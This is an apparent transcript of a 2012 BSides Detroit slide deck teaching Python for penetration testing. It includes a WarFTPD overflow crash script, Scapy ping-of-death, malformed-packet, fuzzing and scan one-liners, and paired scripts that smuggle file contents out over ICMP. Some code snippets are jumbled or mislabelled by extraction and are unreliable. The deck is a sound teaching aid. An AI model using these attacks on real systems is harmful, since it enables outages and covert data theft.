python - Security BSides
Download
Report
Transcript python - Security BSides
>>>import antigravity
Overview of Python
Flying made simple without
the Nyquil hangover
Keith Dixon
@Tazdrumm3r
Agenda
•
•
•
•
•
•
•
About me
About Python
Python basics
Python’s uses
Coding for Penetration Testers book
Tips, tricks, observations
Resources
About me
Who am I?
• Husband/father/geek/gets distracted by shiny objects
easy
• Career path switched to IT in 1999, professionally in IT
since 2001
– Learning, studying, and currently interviewing for
infosec professional roles
• Vbscript – 2007
• Python – 2011
About Python
• Conceived in the late 1980’s by Guido van
Rossum at CWI.
• Python 2.0 was release on October
16th, 2000
• Python 3.0 was released on
December 2008
What is Python good for?
• Python comes with a large standard library that covers areas
such as;
• string processing
• Internet protocols
• software engineering
• operating system interfaces
• Artificial intelligence (because of similarities to Lisp)
What is Python good for?
Extensive use in the information security industry
•
•
•
•
•
•
•
•
•
Exploit development
Network
Debugging
Reverse engineering
fuzzing,
Web
Forensics
Malware analysis
PDF
What is Python good for?
• Easy to write short scripts for system admin work.
• Python code is easy to understand.
• Once the basic syntax is learned, even the most complicated
scripts can make sense.
What is Python good for?
• Python is cross platform!!
• It will work on Linux, Windows, Mac and most every other
OS.
• Many, many resources and a big, friendly community
Python tools
• Social-Engineer Toolkit - specifically designed to perform advanced attacks against the
human element.
• Artillery - a honeypot/monitoring/prevention tool used to protect Linux-based
systems.
• Fast-Track - aimed at helping Penetration Testers in an effort to identify, exploit, and
further penetrate a network.
• Scapy - send, sniff and dissect and forge network packets. Usable interactively or as a
library
• Pytbull - flexible IDS/IPS testing framework (shipped with more than 300 tests)
• Scrapy - a fast high-level screen scraping and web crawling framework, used to crawl
websites and extract structured data from their pages
• W3af - a Web Application Attack and Audit Framework.
Inspiration for the idea? (Part 1)
Inspiration for the idea? (Part 2)
Post CSAW CTF
Python 101
• Indentation does matter
This will work
startNumber = int(raw_input("Enter the start number here "))
endNumber = int(raw_input("Enter the end number here "))
def fib(n):
if n < 2:
return n
return fib(n-2) + fib(n-1)
print map(fib, range(startNumber, endNumber))
But this won’t…
startNumber = int(raw_input("Enter the start number here "))
endNumber = int(raw_input("Enter the end number here "))
def fib(n):
if n < 2:
return n
return fib(n-2) + fib(n-1)
print map(fib, range(startNumber, endNumber))
Python 101
• All scripts are considered
modules
• All functions inside
module can be used or
only certain methods
can be used inside
script
• Help is built in
Entire module
Partial method
>>> import sys
>>> from sys import argv
Help on modules
Help on methods
>>> Import sys, hashlib
>>> help(sys)
>>> help(hashlib)
>>> Import sys, hashlib
>>> help(sys.argv)
>>> help(hashlib.sha512)
keith@dw ~$ pydoc sys
keith@dw ~$ pydoc hashlib
keith@dw ~$ pydoc sys.argv
keith@dw ~$ pydoc hashlib.sha512
Python 101
• It can be ran interactively
Via command prompt
Via shell
keith@dw ~ $ python
• IDLE
• DreamPie
• Ipython
Python 2.72
Type “help”, “copyright”..
>>>
• Scripts
Windows
Linux
File extensions
• *.py – Python script
• *pyc – Compiled Python file
(generated by running script)
File extensions (optional)
• *.py – Python script
• *pyc – Compiled Python file
(generated by running script)
Running scripts
• .py file extension associated with
python.exe
• Should have #!/usr/bin/python at
the top of the script in case you
want to run it on Linux
• If the path to the interpreter is in
your system path, you can
doubleclick script to run,
otherwise…
C:\Users\Keith>python
password.py
Running scripts
• Must have #!/usr/bin/python (path
to python) at the top of the script
• If you’re running it from the
terminal, the script must be
chmod’ed to make it executable or
you can call python and the script
name…
keith@dw ~ $ python password.py
Python 102
• Data types
Numbers
String
List (mutable)
Tuple (non
mutable)
A = 10
B = 0100 or B = 0x41
or B = 0b1000000
C = 3.56
D = 3.16j
A = ‘This is a string’
list = [‘abc’, 45, ‘The
Avengers’, 0x67, ‘def’,
15.5]
list = (‘abc’, 45, ‘The
Avengers’, 0x67,
‘def’, 15.5)
print list
print list [0]
print list [1:3]
print list[2:]
list.append[“Detroit”]
print list
print list [0]
print list [1:3]
print list[2:]
list.append(“Detroit”)
list = [‘abc’, 45, ‘The
Avengers’, 0x67, ‘def’,
15.5,’Detroit’]
AttributeError: 'tuple'
object has no
attribute 'append’
• Integers
• Long integers
(octal, hex,
binary)
• Float
• complex
• Conditional
statements
print A
print A[0]
print A[3:6]
print A[4:]
print A * 2
print A + “ and this is
how it prints”
'This is a string'
‘T’
‘s i’
‘ is a string’
If statement
Else statement
Elif statement
if x = true:
print true
if x = 1:
print “1”
else:
print “not 1”
if expression1:
statement(s)
elif expression2:
statement(s)
else:
statement(s)
Python 102
• Looping
While loop
For loop
Loop control
count = 0
code1 = (sys.argv[1])
while (count < 9):
code_split = code1.split(':')
print 'The count is:', count
count = count + 1
for i in code_split:
code1a = int(i)
print "Good bye!"
codefinal = chr(code1a)
sys.stdout.write(codefinal)
• Functions
Creating a function
def base64_decode(base64_key):
answer=base64_key.decode('base64','strict')
print answer
count = 0
while (count < 9):
print 'The count is:', count
count = count + 1
if count = 7:
break
print "Good bye!"
In use
>>>csaw.base64_decode(‘V2VsY29tZSB0byBCc2lkZXMgRG
V0cm9pdCAyMDEyLiBNYWtlIHN1cmUgdG8gdGhhbmsgUnl
hbiwgU3RldmVuLCBXb2xmZ2FuZywgYW5kIEt5bGUgZm9yI
GFsbCB0aGUgaGFyZCB3b3JrIHRoZXkgZGlkIHRvIG1ha2Ugd
GhpcyB5ZWFyIHN1Y2ggYSBzdWNjZXNzIQ==‘)
>>> Welcome to Bsides Detroit 2012. Make sure to thank
Ryan, Steven, Wolfgang, and Kyle for all the hard work
they did to make this year such a success!
Python 102
• Files
Open a file for reading
#!/usr/bin/python
#!/usr/bin/python
f = open ('base64.txt', 'r')
file = f.read()
import sys
answer=file.decode('base64','strict')
print answer
f.close ( )
• Input/output
Write to a file
if len(sys.argv)<2:
sys.exit("Usage " + sys.argv[0] + " <Base64 code you wish to decode>\n")
basecode = sys.argv[1]
answer=basecode.decode('base64','strict')
print answer
fo = open("base64.txt", "w")
fo.write(answer)
fo.close()
raw_input
input
#!/usr/bin/python
#!/usr/bin/python
str = raw_input("Enter your input: ");
print "Received input is : ", str
str = input("Enter your input: ");
print "Received input is : ", str
Input is Thanks for coming to Bsides
Output is Received input is : Thanks for coming to
Bsides
Input is 5 * 5
Output is 25
Python’s uses – General scripting
• Cryptography
• Password creation
• Use files (write to/read from)
Cryptography
Encode Base64 code
#!/usr/bin/python
code = raw_input("Enter the data you wish to be encoded to Base64")
answer=code.encode('base64','strict')
print answer
Encode ROT13 code
#!/usr/bin/python
code = raw_input("Enter the data you wish to be encoded to Base64")
answer=code.encode('base64','strict')
print answer
Decrypt module
#!/usr/bin/python
import sys
def hexdecode(hex_key):
import binascii
hex_split = hex_key.split(':')
for decode in hex_split:
hex_decode = binascii.a2b_hex(decode)
sys.stdout.write(hex_decode)
def uni_decode(unicode_key):
unicode_split=unicode_key.split(':')
for i in unicode_split:
code1a = int(i)
codefinal = chr(code1a)
sys.stdout.write(codefinal)
def base64_decode(base64_key):
answer=base64_key.decode('base64','strict')
print answer
def binary_decode(binary_key):
import math
f = lambda v, l: [v[i*l:(i+1)*l] for i in range(int(math.ceil(len(v)/float(l))))]
basecode = f (binary_key,8)
for code in basecode:
x = (code)
decodea = int(code,2)
decodeb = chr(decodea)
sys.stdout.write(decodeb)
def rot13_decode(rot13_key):
answer=rot13_key.decode('rot13','strict')
print answer
Decrypt module
Decrypt module
Password creation
##Author: ATC
##Please score this on activestate
import string, random
print "How many characters would you like the password to have?"
print "Must be nine or more"
length = input ()
password_len = length
password = []
for group in (string.ascii_letters, string.punctuation, string.digits):
password += random.sample(group, 3)
password += random.sample(
string.ascii_letters + string.punctuation + string.digits,
password_len - len(password))
random.shuffle(password)
password = ''.join(password)
print password
http://code.activestate.com/recipes/577905-password-generator/
Use files (write to/read from)
Read from a file
#!/usr/bin/python
f = open ('base64.txt', 'r')
file = f.read()
answer=file.decode('base64','strict')
f.close ( )
Write to a file
#!/usr/bin/python
code = raw_input("Enter the data you wish to be encoded to Base64")
answer=code.encode('base64','strict')
f=open('base64.txt','w')
line=f.write(answer)
f.close ( )
Python’s uses – Networking
• Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a
library
• Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests)
• Mallory, man-in-the-middle proxy for testing
• mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows
to be inspected and edited on the fly
• Impacket: craft and decode network packets. Includes support for higher-level
protocols such as NMB and SMB
• Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist
• pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
• libdnet: low-level networking routines, including interface lookup and Ethernet frame
transmission
• dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP
protocols
• pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly
and port scan detection
• Dirtbags py-pcap: read pcap files without libpcap
• flowgrep: grep through packet payloads using regular expressions
• httplib2: comprehensive HTTP client library that supports many features left out of
other HTTP libraries
http://www.dirk-loss.de/python-tools.htm
Scapy
• Packet creation
• Read PCAP files
• Create graphical dumps
• Must have appropriate supporting
tools installed
• Fuzzing
• Send and receive packets
• TCP traceroute (can do graphical dump
as well)
• Sniffing
• Send and receive files through
alternate data channels (ICMP)
• Ping
• ARP ping
• ICMP ping
• TCP ping
• UDP ping
• Wireless frame injection
• OS Fingerprinting
www.secdev.org/projects/scapy/
• Classic attacks
• Malformed packets
• Ping of death
• Nestea attack
• ARP cache poisoning
• Scans
• SYN scan
• ACK scan
• XMAS scan
• IP scan
• TCP port scan
• IKE scan
• Advanced traceroute
• TCP SYN traceroute
• UDP traceroute
• DNS traceroute
• VLAN hopping
• Wireless sniffing
• Firewalking
Scapy
• Packet creation
• Stacking layers
Scapy
• Read PCAP files
• A=rdpcap(“<directory where PCAP file is>/<pcap file>”)
• Create graphical dumps
• A[<packet number>].psdump(“<location to store .eps file>, layer_shift=1)
Scapy
ConfickerB9hrs.pcap
Scapy
Send packets
•
•
•
send(IP(dst=“192.168.1.1")/ICMP())
sendp(Ether()/IP(dst=" 192.168.1.1 ",ttl=(1,4)), iface="eth0")
sendp(rdpcap("/tmp/pcapfile"))
Scapy
Scapy
sendp("I’m travelling on Ethernet", iface="eth0", loop=1, inter=0.2)
Scapy
Send and receive packets
•
p=sr1(IP(dst="www.slashdot.org")
/ICMP()/"XXXXXXXXXXX")
•
p=sr1(IP(dst="www.slashdot.org")
/ICMP()/" ABCDEFGHIJ ")
•
p.show()
Scapy
Send and receive packets
• p=sr1(IP(dst="www.slashdot.org")/ICMP()/“ABCDEFGHIJ")
Scapy
Send and receive packets
• sr(IP(dst="192.168.1.10")/TCP(dport=[21,22,23]))
• sr(IP(dst=" 192.168.1.10 ")/TCP(dport=[21,22,23]),inter=0.5,retry=-2,timeout=1)
Scapy
Fuzzing
•
•
send(IP(dst=“192.168.1.10")/fuzz(ICMP()/NTP(version=4)),loop=1)
send(IP(dst="192.168.1.10")/fuzz(TCP()/NTP(version=4)),loop=1)
TCP traceroute
•
res,unans =
traceroute(["www.microsoft.com","www.cisco.com","www.yahoo.com
],dport=[80,443],maxttl=20,retry=-2) "
Scapy
Scapy
Scapy
Sniffing
• sniff(filter="icmp and host 66.35.250.151", count=2)
• a=_
• a.nsummary()
• a[1]
• sniff(iface="eth0", prn=lambda x: x.show())
Scapy
SYN scan
•
•
•
sr1(IP(dst="72.14.207.99")/TCP(dport=80,flags="S"))
sr(IP(dst="192.168.1.1")/TCP(sport=666,dport=(440,443),flags="S"))
sr(IP(dst="192.168.1.1")/TCP(sport=RandShort(),dport=[440,441,442,443],flags="S"))
• ans.summary()
• ans.summary( lambda(s,r): r.sprintf("%TCP.sport% \t %TCP.flags%") )
Scapy
Scapy
Classic attacks
• Malformed packets
• send(IP(dst="192.168.1.10", ihl=2, version=3)/ICMP())
• Ping of death
• send( fragment(IP(dst=" 192.168.1.10 ")/ICMP()/("X" * 60000)) )
• send(IP(dst="192.168.1.10", ihl=2, version=3)/ICMP())
• send( fragment(IP(dst=" 192.168.1.10 ")/ICMP()/("X" * 60000)) )
Scapy
Scapy
Scapy
To send packets via ICMP
#!/usr/bin/python
import sys
from scapy.all import *
conf.verb = 0
f = open(sys.argv[1])
data = f.read()
f.close()
host = sys.argv[2]
print "Data size is %d " %len(data)
i=0
while i<len(data):
pack = IP(dst=host)/ICMP(type="echo-reply")/data[i:i+32]
send(pack)
i = i+32
print "Data sent"
Scapy
To receive packets via ICMP
#!/usr/bin/python
import sys
from scapy.all import *
conf.verb=0
f=open(sys.argv[1],"w")
host=sys.argv[2]
count = int(sys.argv[3])
filter="icmp and host " + host
print "sniffing with filter (%s) for %d bytes" %
(filter,int(count))
packets = sniff(count,filter=filter)
for p in packets:
f.write(p['Raw'].load)
f.close()
print "Data received"
Python’s uses – Debugging and Reverse Engineering
•
•
•
•
•
•
•
•
•
•
•
Immunity Debugger: scriptable GUI and command line debugger
• mona.py: PyCommand for Immunity Debugger that replaces and improves on
pvefindaddr
Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
IDAPython: IDA Pro plugin that integrates the Python programming language, allowing
scripts to run in IDA Pro
pefile: read and work with Portable Executable (aka PE) files
pydasm: Python interface to the libdasm x86 disassembling library
PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the
executable file in memory
diStorm64: disassembler library for AMD64, licensed under the BSD license
python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace
processes) written in Python
vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python,
and vdb is a debugger which uses it (mirror)
Androguard: reverse engineering and analysis of Android applications
http://www.dirk-loss.de/python-tools.htm
Coding for Pentesters - Exploitation scripting
Coding for Pentesters – Exploitation scripting
Building Exploits with Python
1. Windows XP SP0
2. War-FTPD v 1.65
3. Immunity Debugger
Coding for Pentesters – Exploitation scripting
Step 1 – Open WarftpD with Immunity
Coding for Pentesters – Exploitation scripting
Step 2 – Run WarFTPD by pressing F9 and then set it to GoOnline.
Coding for Pentesters – Exploitation scripting
Step 3 – Build this script and run it…. and enjoy the
show
#!/usr/bin/python
import sys
import socket
hostname = sys.argv[1]
username = "A"*1024
passwd = "anything"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r = sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" %username)
r = sock.recv(1024)
print "[+] " + r
sock.send("pass %s\r\n" %passwd)
r = sock.recv(1024)
print "[+] " + r
sock.close()
Coding for Pentesters – Exploitation scripting
The connection attempt with the user name of
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Coding for Pentesters – Exploitation scripting
Coding for Pentesters – Exploitation scripting
Step 4 - WarFTPD crashes!
Python’s uses – Malware analysis
•
•
•
•
•
•
•
•
•
•
•
•
•
•
torwget.py: Multi-platform TOR-enabled URL
clamav_to_yara.py: Convert ClamAV antivirus signatures to
YARA rules
peid_to_yara.py: Convert PEiD packer signatures to YARA rules
av_multiscan.py: Script to implement your own antivirus multiscanner
pescanner.py: Detect malicious PE file attributes
ssdeep_procs.py: Detect self-mutating code on live Windows
systems using ssdeep
avsubmit.py: Command-line interface to VirusTotal,
ThreatExpert, Jotti, and NoVirusThanks
dbmgr.py: Malware artifacts database manager
artifactscanner.py: Application to scan live Windows systems
for artifacts (files, Registry keys, mutexes) left by malware
mapper.py: Create static PNG images of IP addresses plotted
on a map using GeoIP
googlegeoip.py: Create dynamic/interactive geographical maps
of IP addresses using Google charts
sc_distorm.py: Script to produce disassemblies (via DiStorm) of
shellcode and optionally apply an XOR mask
vmauto.py: Python class for automating malware execution in
VirtualBox and VMware guests
mybox.py: Sample automation script for VirtualBox based on
vmauto.py
Python’s uses – Malware analysis
•
•
•
•
•
•
•
•
•
•
•
•
myvmware.py: Sample automation script for VMware based
on vmauto.py
analysis.py: Python class for building sandboxes with support
for analyzing network traffic, packet captures, and memory
scd.py: Immunity Debugger PyCommand for finding shellcode
in arbitrary binary files
findhooks.py: Immunity Debugger PyCommand for finding
Inline-style user mode API hooks
pymon.py: WinAppDbg plug-in for monitoring API calls,
alerting on suspicious flags/parameters and producing an
HTML report
xortools.py: Python library for encoding/decoding XOR,
including brute force methods and automated YARA signature
generation
trickimprec.py: Immunity Debugger PyCommand for assistance
when rebuilding import tables with Import REconstructor
kraken.py: Immunity Debugger PyCommand for cracking
Kraken’s Domain Generation Algorithm (DGA)
sbstrings.py: Immunity Debugger PyCommand for decrypting
Silent Banker strings
install_svc.py: Python script for installing a service DLL and
supplying optional arguments to the service
dll2exe.py: Python script for converting a DLL into a standalone
executable
windbg_to_ida.py: Python script to convert WinDbg output
into data that can be imported into IDA
Python’s uses – Malware analysis
Practical Malware Analysis
• FakeNet - http://practicalmalwareanalysis.com/
Python’s uses – Malware analysis
• Cuckoo Sandbox - a malware analysis system used to analyze Windows
executables, DLL files, PDF documents, Office documents, PHP scripts,
Python scripts, Internet URLs and almost anything else you can imagine.
• yara-python: identify and classify malware samples
• pyew: command line hexadecimal editor and disassembler, mainly to
analyze malware
• Exefilter: filter file formats in e-mails, web pages or files. Detects many
common file formats and can remove active content
• pyClamAV: add virus detection capabilities to your Python software
• jsunpack-n, generic JavaScript unpacker: emulates browser functionality to
detect exploits that target browser and browser plug-in vulnerabilities
• phoneyc: pure Python honeyclient implementation
http://www.dirk-loss.de/python-tools.htm
Python’s uses – Fuzzing
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
Sickfuzz: a fuzzer made out of several custom .spk files and a python script to wrap them up,
including some tshark support and other features.
Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible
components
Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing
antiparser: fuzz testing and fault injection API
TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based
application fuzzer)
FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external
program in batches
Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined
patterns
Fuzzbox: multi-codec media fuzzer
Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing
fuzzed files in order to test the robustness of forensics tools and examination systems
Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess
Communication mechanisms
WSBang: perform automated security testing of SOAP based web services
Construct: library for parsing and building of data structures (binary or textual). Define your data
structures in a declarative manner
fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano
Fusil: Python library used to write fuzzing programs
http://www.dirk-loss.de/python-tools.htm
Python’s uses – Fuzzing
Sickfuzz
Python’s uses – Web
• Scrapy: a fast high-level screen scraping and web crawling framework, used
to crawl websites and extract structured data from their pages. It can be
used for a wide range of purposes, from data mining to monitoring and
automated testing.
• ProxMon: processes proxy logs and reports discovered issues
• Twill: browse the Web from a command-line interface. Supports
automated Web testing
• Windmill: web testing tool designed to let you painlessly automate and
debug your web application
• FunkLoad: functional and load web tester
• spynner: Programmatic web browsing module for Python with
Javascript/AJAX support
• python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript
engine; allows for the evaluation and calling of Javascript scripts and
functions
http://www.dirk-loss.de/python-tools.htm
Python’s uses – Web
http://snippets.scrapy.org/snippets/7/
Python’s uses – Forensics
• Volatility: extract digital artifacts from volatile memory (RAM)
samples
• SandMan: read the hibernation file, regardless of Windows
version
• LibForensics: library for developing digital forensics applications
• TrIDLib, identify file types from their binary signatures. Now
includes Python binding
• aft: Android forensic toolkit
http://www.dirk-loss.de/python-tools.htm
Python’s uses – Forensics
Volatility
Python’s uses – Miscellaneous
•
•
•
•
•
•
InlineEgg: toolbox of classes for writing small assembly programs in Python
Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas,
centered on social network services, search engines and instant messaging
RevHosts: enumerate virtual hosts for a given IP address
simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API
PyMangle: command line tool and a python library used to create word lists for use with other penetration
testing tools (abandoned?)
Hachoir: view and edit a binary stream field by field
Other useful libraries and tools
• IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and
its own special command system
• Beautiful Soup: HTML parser optimized for screen-scraping
• Mayavi: 3D scientific data visualization and plotting
• Twisted: event-driven networking engine
• Suds: lightweight SOAP client for consuming Web Services
• M2Crypto: most complete OpenSSL wrapper
• NetworkX: graph library (edges, nodes)
• pyparsing: general parsing module
• lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
• Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python
• Pexpect: control and automate other programs, similar to Don Libes `Expect` system
• Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython
• PyQt and PySide: Python bindings for the Qt application framework and GUI library
http://www.dirk-loss.de/python-tools.htm
Coding for Penetration Testers book
Script
Function
Learned
Webcheck_v1.py
Monitor web server – verify it
remains up
1.
2.
Script arguments
Connect to web server and run a GET request
Webcheck_v2.py
Monitor web server – verify it
remains up (default to port 80)
1.
Alternate script arguments method
Subnetcalc.py
Calculate subnet mask, broadcast
address, network range, and
gateway from IP/CIDR
1.
2.
3.
4.
Parse out values programmatically
Math functions with variables
Displaying results
Using FOR loops
Pass.py
Determines if users are using the
original default assigned password
1. Use the crypt module
Robotparser.py
Retrieve the paths from the
robot.txt
1.
2.
Parse the robots.txt file with the built robotparser module
Nesting FOR loops
root_check.py
Checks to see what permissions
logged in account has (normal
user, root or system account)
1.
2.
Using IF and ELIF conditional statements
Use OS module to make system calls
Readshadow.py
Checks to see if you have
permission to read /etc/shadow
1.
2.
Use OS module to make system calls
Tests permissions on files to see if current credentials can read file
Network_socket.py
Connect to website, pull contents
(hard coded)
1.
2.
Network socket creation
Spaces will bite you in the ass where you least expect it.
Coding for Penetration Testers book
Script
Function
Learned
network_socket_argum
ent.py
Connect to website, pull contents
(site specified by argument)
1.
2.
Server_connect.py
Once a connection is made, send
back a string
1. Network socket creation
2. Allow incoming connections.
receiveICMP.py
To receive a file from another
system via ICMP (in conjunction
with sendICMP.py)
1.
Python script using Scapy
sendICMP.py
To send a file to another system
via ICMP (in conjunction with
receiveICMP.py)
1.
Python script using Scapy
Network socket creation
Spaces will bite you in the ass where you least expect it.
Little gems I found
Description
Function
Site
Python-nmap
It’s a Python library which helps in
using nmap.
http://xael.org/norman/python/pythonnmap/
Python API to the VirtualBox
VM
Allowing you to control every
aspect of virtual machine
configuration and execution
http://download.virtualbox.org/virtualbox
/SDKRef.pdf
Py2Exe
py2exe is
a Python Distutils extension
which converts Python scripts
into executable Windows
programs, able to run without
requiring a Python installation.
http://www.py2exe.org/
Chrome
extensions/applications
Various extensions/applications
found in the Chrome Webstore
•
•
•
https://chrome.google.com/webstore/
detail/gdiimmpmdoofmahingpgabiikim
jgcia <-- Python shell (browser button)
https://chrome.google.com/webstore/
detail/cmlchnlmkdcpelgmkebknjgjgdd
ncelc - Python shell (Chrome
application)
https://chrome.google.com/webstore/
detail/nckbgikkpbjdliigbhgjfgfcahhona
kp <-- Online Python development
environment
Little gems I found
Extra extra credit
Description
Function
Site
Tweepy
It’s the best working Python
library to interface with Twitter
(so far)
http://tweepy.github.com/
Tweepy
• Direct message
• Check friends timelines
• Create favorites
http://talkfast.org/2010/05/31/twitter-from-the-command-line-in-python-using-oauth
Tips, tricks, etc.
IDE (http://wiki.python.org/moin/IntegratedDevelopmentEnvironments)
• Windows
• PyScripter
• Aptana Studio
• IDLE
• Ninja
• Wing IDE
• Linux
• IDLE
• Geany
• Python Toolkit
• SPE
• ERIC (supposed to have auto-complete of code…)
Editors (http://wiki.python.org/moin/PythonEditors)
• Windows
• Notepad++
• Linux
• Gedit
• SCiTE
Tips, tricks, etc.
Shells
•
•
•
•
•
DreamPie
• Automatic of completion of attributes and file names
• History box
• Code box
IDLE
• Included with Python install
Ipython
PyShell
Guake
Other
•
PythonAnywhere
• http://pythonanywhere.com/
Tips, tricks, etc.
Linux vs. Windows
Linux
•
Linux scripts can be ran via terminal
• calling python <script name>
• by putting #!/usr/bin/python at the top (path
to interpreter) and typing ./<script name>
• Common problem on PyScripter
(awesome Windows Python IDE)… extra
code comments are put at the top, then
the #! /usr/bin/python
Windows
•
Windows scripts don’t need the #! but need to have
.py associated with Python interepreter.
• Scripts can be double clicked or ran from
command prompt python <script name>
• If the script is double clicked, without
having raw_input("Press ENTER to exit")
you may not see the output of the script.
Portable Python (Windows only)
•
Portable Python is a Python® programming
language preconfigured to run directly from any USB
storage device, enabling you to have, at any time, a
portable programming environment. Just download
it, extract to your portable storage device or hard
drive and in 10 minutes you are ready to create your
next Python® application.
• Portable Python 2.7.2.1 package contains
following applications/libraries:
• PyScripter v2.4.1
• NymPy 1.6.0
• SciPy 0.90
• Matplotlib 1.0.1
• PyWin32 216
• Django 1.3
• PIL 1.1.7
• Py2Exe 0.6.9
• wxPython 2.8.12.0
• Portable Python 3.2.1.1 package contains
following applications/libraries (alphabetical
order):
• NetworkX v1.4
• PySerial 2.5
• PyScripter v2.4.1
• PyWin32 v.216
• RPyC-3.0.7
Tips, tricks, etc.
Additional resources
Beginners guides from Python
• http://wiki.python.org/moin/BeginnersGuide/NonProgrammers
• http://wiki.python.org/moin/BeginnersGuide/Programmers
Additional resources
Extra tools
• http://mashable.com/2007/10/02/python-toolbox/
Online exercises
• http://codingbat.com/python
• http://homepage.mac.com/s_lott/books/python.html
• http://web.archive.org/web/20110625065328/http://diveintopython.org/toc/index.html
• http://anh.cs.luc.edu/python/hands-on/
• http://code.google.com/edu/languages/google-python-class/index.html
• http://www.cdf.toronto.edu/~csc148h/winter/
• http://www.cdf.toronto.edu/~csc108h/fall/
• http://projecteuler.net/
• http://www.upriss.org.uk/python/PythonCourse.html
• http://www.pythonchallenge.com/
• http://learnpythonthehardway.org/
• http://www.awaretek.com/tutorials.html
• http://www.checkio.org/
• http://www.pyschools.com/
General learning materials
• http://www.py4inf.com/
Free online videos
• http://freevideolectures.com/Course/2512/Python-Programming
• http://showmedo.com/videotutorials/python
• http://www.python.org/doc/av/
• http://thenewboston.org/list.php?cat=36
Additional resources
Online books
• http://en.wikibooks.org/wiki/Python_Programming
Online interactive tutorial/interpreter
• http://www.trypython.org
• http://www.learnpython.org/
• https://languageshells.appspot.com/
Forums
• http://www.python-forum.org
• http://stackoverflow.com/questions/tagged/python
• http://www.daniweb.com/software-development/python/114
Module/package repositories
• http://pypi.python.org/pypi The Python Package Index is a repository of software for the Python
programming language. There are currently 17409 packages here.
• http://code.activestate.com/recipes/ The ActiveState Code Recipes contains 3850 snippets to
learn from and use.
Python tools for penetration testers
• http://www.dirk-loss.de/python-tools.htm
Training
• SecurityTube Python Scripting Expert
• http://securitytube-training.com/certifications/securitytubepython-scripting-expert/?id=main
• Module 1: Python Scripting – Language Essentials
• Module 2: System Programming and Security
• Module 3: Network Security Programming – Sniffers
and Packet Injectors
• Module 4: Attacking Web Applications
• Module 5: Exploitation Techniques
• Module 6: Malware Analysis and Reverse Engineering
• Module 7: Attack Task Automation
• Module 8: Further Study and Roadmap
• Module 9: Exam Pattern and Mock Exam
•
PYTHON TRAINING FOR SECURITY PROFESSIONALS
• http://www.trainace.com/courses/python/
• Log Parsing with Python
• Pcap Parsing with Python
• Network Attack with Python
• Web Application Attack with Python
• Malware Analysis with Python
• Exploit Development with Python
Additional resources
All the scripts
Category
CSAW Crypto
Redux –
Challenge 1 to
5
Extra credit
Coding for
Penetration
Testers – part 1
Coding for
Penetration
Testers – part 2
Coding for
Penetration
Testers – part 3
Extra extra
credit
Script
Etc.
Antigravity
• When you open up ModulesDocs and
click on antigravity module or from IDLE
run import antigravity, a web browser
opens to the XKCD cartoon at the
beginning of this slide deck.
Zen of Python
• To start the path of finding Zen of Python,
remember these two key words…
